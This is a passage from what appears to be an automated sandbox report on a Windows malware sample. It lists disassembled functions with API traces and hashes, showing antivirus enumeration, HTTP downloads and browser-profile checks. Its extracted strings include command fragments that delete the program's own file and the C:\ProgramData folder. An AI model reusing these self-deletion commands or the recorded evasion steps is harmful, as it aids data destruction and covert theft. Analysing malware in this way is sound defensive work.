strtok_s.MSVCRT ref: 00413542
StrCmpCA.SHLWAPI(?,true), ref: 00413604

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 004136C6
lstrcpyA.KERNEL32(?,00000000), ref: 004136F7
lstrcpyA.KERNEL32(?,00000000), ref: 00413733
lstrcpyA.KERNEL32(?,00000000), ref: 0041376F
lstrcpyA.KERNEL32(?,00000000), ref: 004137AB
lstrcpyA.KERNEL32(?,00000000), ref: 004137E7
lstrcpyA.KERNEL32(?,00000000), ref: 00413823
strtok_s.MSVCRT ref: 004138E7

Strings

true, xrefs: 004135FE
.yA, xrefs: 0041390C
false, xrefs: 0041361D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: .yA$false$true
API String ID: 2116072422-172179223
Opcode ID: e91ceeb6a48ad87f83f91d1c1d8f37244887e8741403f1702a9379040803f4fe
Instruction ID: 24cad224f03a834ddb7ab32ec961733dd6e87f70121d638159c05c5485e08ed1
Opcode Fuzzy Hash: e91ceeb6a48ad87f83f91d1c1d8f37244887e8741403f1702a9379040803f4fe
Instruction Fuzzy Hash: 34B15D75901218ABCF60EF55DC89ACA77B5BF18305F0001EAE549A72A1EB74AFD4CF48

Function 00405237 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: ca00e90118eece4118b53982b82e7f632d286a02c00701fdeb5fa8130ba83cd3
Instruction ID: 649a455fab281907b033428d21320bc7918caf67f0edc17d0281e591b72b3735
Opcode Fuzzy Hash: ca00e90118eece4118b53982b82e7f632d286a02c00701fdeb5fa8130ba83cd3
Instruction Fuzzy Hash: 31512DB1900A2CAFDB20DF64DC85BEFBBB9EB08346F0050A6F509A6290D7745E818F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413EBF,?,AV: ,004368B8,Install Date: ,004368A4,00000000,Windows: ,00436894,Work Dir: In memory,0043687C), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Unknown, xrefs: 00411AB4
Unknown, xrefs: 00411AA0
root\SecurityCenter2, xrefs: 004119F0
displayName, xrefs: 00411A6F
WQL, xrefs: 00411A28
Unknown, xrefs: 00411A99
Select * From AntiVirusProduct, xrefs: 00411A23

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: c16cceff4340b5fdb7fabdafb8cc409fc350fbdd6c69cba04191f19824741683
Instruction ID: 4938ffd318524f863889dd74757c206b5cbbe61c7953879002706eb697a4c60c
Opcode Fuzzy Hash: c16cceff4340b5fdb7fabdafb8cc409fc350fbdd6c69cba04191f19824741683
Instruction Fuzzy Hash: C6315270A00245BBCB20DBD5DC49EEFBF7DEFC9B14F20425AF611A61A0C6B85941CB28

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9E0), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9E4), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9E8), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9F0), ref: 00401308
lstrcatA.KERNEL32(?,0043A9F4), ref: 00401316
lstrcatA.KERNEL32(?,0043A9F8), ref: 00401324
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401332
lstrcatA.KERNEL32(?,0043AA00), ref: 00401340
lstrcatA.KERNEL32(?,0043AA04), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA08), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA0C), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA10), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: a3f4b10641a3f8cfb1637660811e7a1406b529f59d4337c89fc2319f21a73716
Instruction ID: 840bbaa224d9e32a4fee1d77fd51f95d1e660946e4172a3f681474d2d0ecd0e9
Opcode Fuzzy Hash: a3f4b10641a3f8cfb1637660811e7a1406b529f59d4337c89fc2319f21a73716
Instruction Fuzzy Hash: D54185B2D4422C66DB20DB719C59FDB7BAC9F14350F5009A3E8D8E3191D67CDA84CB98

Function 004181CA Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004181EF
_memset.LIBCMT ref: 004181FE
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00418213

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 004183AF
_memset.LIBCMT ref: 004183BE
_memset.LIBCMT ref: 004183D0
ExitProcess.KERNEL32 ref: 004183E0

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

" & exit, xrefs: 00418333
" & rd /s /q "C:\ProgramData\, xrefs: 0041828C
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004182E9
" & exit, xrefs: 004182E2
/c timeout /t 10 & del /f /q ", xrefs: 0041823E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: c10a7bfac38d969d9f32c1df69e5969f2f6c4981be27888065d2da150619d8dc
Instruction ID: d22466200f08a5a0a9ac60e63e45474465906b9f888c7e7b530f86c598890a44
Opcode Fuzzy Hash: c10a7bfac38d969d9f32c1df69e5969f2f6c4981be27888065d2da150619d8dc
Instruction Fuzzy Hash: 3C51AEB1D4022A9BCB61EF15CD81ADDB3BCEB44708F4110EAA718B7152DA746FC68F58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E30), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436EC0,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Strings

:\, xrefs: 00410A06
QuBi, xrefs: 00410A27
yvA, xrefs: 00410B21
C, xrefs: 004109DF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C$QuBi$yvA
API String ID: 1856320939-1784037136
Opcode ID: 816386ce3ce160ec5e36b6258b51886f0826017c6e3f08db21d932491a397d8f
Instruction ID: efcbaf9834fb95729d7da2b89f9ca5b6ee7f5f88d4b54ff6a9ea0730197fbe1c
Opcode Fuzzy Hash: 816386ce3ce160ec5e36b6258b51886f0826017c6e3f08db21d932491a397d8f
Instruction Fuzzy Hash: 1241AEB1A0022C9BCB25AF799D85ADEBBB9EF19304F0000EAF149E3160D6748FC58F55

Function 00411203 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043673A,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E80), ref: 004113DC

Strings

|hC, xrefs: 00411494
- , xrefs: 004113E6
?, xrefs: 00411263
%s\%s, xrefs: 004112D7

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?$|hC
API String ID: 1736561257-268609487
Opcode ID: 3b9852f183a5608cd097ea28575f269bd961f4a8b201359511953a91db55f479
Instruction ID: 52712ad16253859975dd4b599dac44ee30e951b4df1b29cbcb008f7b39d866a1
Opcode Fuzzy Hash: 3b9852f183a5608cd097ea28575f269bd961f4a8b201359511953a91db55f479
Instruction Fuzzy Hash: AA6108B590022C9BEB21DB15DD84EDEB7B9EB44304F1042E6A608B2161DF74AEC9CF54

Function 0040EABC Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?), ref: 0040EAF9
StrCmpCA.SHLWAPI(?), ref: 0040EB56
StrCmpCA.SHLWAPI(?,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(?), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040ECE3
StrCmpCA.SHLWAPI(?), ref: 0040ED40

Strings

Stable\, xrefs: 0040ED5B
wA, xrefs: 0040ECD0, 0040EAE6
Stable\, xrefs: 0040EB71
firefox, xrefs: 0040EE17

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox$wA
API String ID: 3722407311-2920489863
Opcode ID: 08406e4ee38140afc5c8d5ec026c77fdafe980cfc8f3abf84a6f3dd3c6702c0a
Instruction ID: a24251b8aee7965f5f3b19e4b93c75cd325559f1d2f0cf67c9562ca4b8716c26
Opcode Fuzzy Hash: 08406e4ee38140afc5c8d5ec026c77fdafe980cfc8f3abf84a6f3dd3c6702c0a
Instruction Fuzzy Hash: 8EB19F72D00109AFDF20FBA9D947B8D7772AF40318F550126F904B7291DA78AA588BDA

Function 0041681F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
lstrlenA.KERNEL32(?), ref: 0041687E

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,0041688A,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 00416893
lstrlenA.KERNEL32(?), ref: 004168A2
lstrlenA.KERNEL32(00000000), ref: 004168BB

Strings

ERROR, xrefs: 004168DE
ERROR, xrefs: 0041686D
ERROR, xrefs: 004168D0
ERROR, xrefs: 004168D7
ERROR, xrefs: 004168C6

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: de968edb469bff347a62552bd156ac8d7c7a76cdf7487afce64d4a3dedf1cfab
Instruction ID: b0fa046f471520956933b445c1a257446e1480c7bd909ead00353cb2abe32d9c
Opcode Fuzzy Hash: de968edb469bff347a62552bd156ac8d7c7a76cdf7487afce64d4a3dedf1cfab
Instruction Fuzzy Hash: E821AC31A01214ABCB20BB75DC4A9ED77A5AF04304F12513BF900E71A2DA78DD859B99

Function 004067ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
